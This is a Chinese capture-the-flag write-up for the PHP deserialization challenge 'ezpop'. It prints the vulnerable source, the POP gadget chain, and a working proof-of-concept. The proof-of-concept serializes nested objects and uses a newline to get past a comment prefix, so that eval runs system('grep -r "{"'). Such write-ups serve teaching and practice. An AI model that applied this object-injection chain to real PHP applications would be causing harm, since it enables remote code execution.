ezpop
直接得到源码:
<?php
/**
 * Challenge class with two public properties.
 *
 * Because the properties are public and the script below feeds request data
 * to unserialize(), both values are whatever the serialized input says.
 */
class crow
{
public $v1;
public $v2;
/**
 * Instantiates the class named by $v1, passing $v2 to its constructor, and
 * echoes the new object (echo forces a string conversion).
 *
 * Security: class name and constructor argument both come from properties,
 * so on unserialized input this is arbitrary class instantiation.
 * Nothing in this listing calls this method.
 */
function eval() {
echo new $this->v1($this->v2);
}
/**
 * Runs when the object is called like a function; calls world() on $v1.
 *
 * No class in this listing defines world(), so if $v1 is an object whose
 * class has __call(), that handler receives the call.
 */
public function __invoke()
{
$this->v1->world();
}
}
/**
 * Challenge class whose destructor, run() and __call() each hand control to
 * whatever object is stored in the public property $f1.
 */
class fin
{
public $f1;
/**
 * Runs automatically when the object is destroyed, including objects that
 * were created by unserialize().
 *
 * The string concatenation converts $f1 to a string, which invokes
 * __toString() when $f1 is an object that defines it.
 */
public function __destruct()
{
echo $this->f1 . '114514';
}
/**
 * Calls $f1 as a callable; an object that defines __invoke() qualifies.
 */
public function run()
{
($this->f1)();
}
/**
 * Fallback for calls to methods fin does not define.
 *
 * The requested method name ($a) and arguments ($b) are ignored; the handler
 * always echoes the result of $f1->get_flag().
 */
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
/**
 * Challenge class whose string conversion has a side effect.
 */
class what
{
public $a;
/**
 * Invoked whenever the object is used as a string.
 *
 * Calls run() on $a before returning the fixed text 'hello', so a plain
 * string conversion of this object executes a method on another
 * property-supplied object.
 */
public function __toString()
{
$this->a->run();
return 'hello';
}
}
/**
 * Challenge class that ends in eval() on its public property $m1.
 */
class mix
{
public $m1;
/**
 * Calls $m1 as a callable; an object that defines __invoke() qualifies.
 */
public function run()
{
($this->m1)();
}
/**
 * Evaluates the string '#' . $m1 as PHP code and returns nothing.
 *
 * Security: the '#' prefix is not a safeguard. A PHP line comment ends at
 * the first line break, so it does not neutralise multi-line input, and
 * eval() on a property that unserialize() can set is code execution.
 */
public function get_flag()
{
eval('#' . $this->m1);
}
}
// Security: unserialize() on a raw POST field lets the client decide which of
// the classes above are instantiated and with which property values; their
// magic methods (__destruct, __toString, __invoke, __call) then run on that
// data. Untrusted input should be decoded with json_decode(), or at minimum
// with unserialize($data, ['allowed_classes' => false]).
if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
// Without a 'cmd' field the script prints its own source.
highlight_file(__FILE__);
}
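pop链:
fin::__destruct → what::__toString → mix::run → crow::__invoke → fin::__call → mix::get_flag → eval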
poc:
<?php
/**
 * Local stub of the target's crow class: same class and property names, so
 * serialize() emits data the target's class accepts. Methods are omitted
 * because serialized data carries only property values.
 */
class crow
{
public $v1;
public $v2;
/** Stores the two values that will be serialized as $v1 and $v2. */
public function __construct($v1,$v2)
{
$this->v1 = $v1;
$this->v2 = $v2;
}
}
/**
 * Local stub of the target's fin class; only the $f1 property is reproduced.
 */
class fin
{
public $f1;
/** Stores the value that will be serialized as $f1. */
public function __construct($f1)
{
$this->f1 = $f1;
}
}
/**
 * Local stub of the target's what class; only the $a property is reproduced.
 */
class what
{
public $a;
/** Stores the value that will be serialized as $a. */
public function __construct($a)
{
$this->a = $a;
}
}
/**
 * Local stub of the target's mix class.
 *
 * NOTE(review): unlike the other stubs and the target's own class, $m1 is not
 * declared here, so the constructor creates it as a dynamic property
 * (deprecated since PHP 8.2).
 */
class mix
{
/** Stores the value that will be serialized as $m1. */
public function __construct($m1)
{
$this->m1 = $m1;
}
}
// Builds a nested object graph from the stub classes and prints it serialized
// and URL-encoded, i.e. in the form the target passes from its 'cmd' POST
// field to unserialize().
// The innermost mix holds a two-line string; the target prepends '#' to it
// before eval(), which comments out only the first line.
// Detection: the observable trace is a POST body carrying PHP serialized-object
// markers (O:<len>:"<class>", URL-encoded in transit) for the classes above.
$a = new fin(new what(new mix(new crow(new fin(new mix(';
system(\'grep -r "{"\');')),''))));
echo urlencode(serialize($a));
小记:
因为太菜了所以比赛的时候只做出了pop,其他题目等复现了再放上来